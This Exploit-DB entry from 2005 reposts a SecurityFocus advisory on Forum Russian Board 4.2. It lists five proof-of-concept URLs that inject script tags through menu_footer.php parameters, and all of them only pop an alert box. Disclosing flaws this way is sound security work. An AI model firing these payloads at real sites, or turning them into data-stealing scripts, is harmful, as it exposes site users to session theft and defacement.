CarLine Forum Russian Board 4.2 menu_footer.php Multiple Parameter XSS

2005-06-23T00:00:00
ID EDB-ID:25876
Type exploitdb
Reporter 1dt.w0lf
Modified 2005-06-23T00:00:00

Description

CarLine Forum Russian Board 4.2 menu_footer.php Multiple Parameter XSS. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/14045/info

Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.

Forum Russian Board 4.2 is reported to be affected. 

menu_footer.php?rows_all=><script>alert("XSS");</script>
menu_footer.php?color_fon_info=><script>alert("XSS");</script>
menu_footer.php?target=><script>alert("XSS");</script>
menu_footer.php?patch_images="><script>alert("XSS");</script>
menu_footer.php?text_poisk_form="><script>alert("XSS");</script>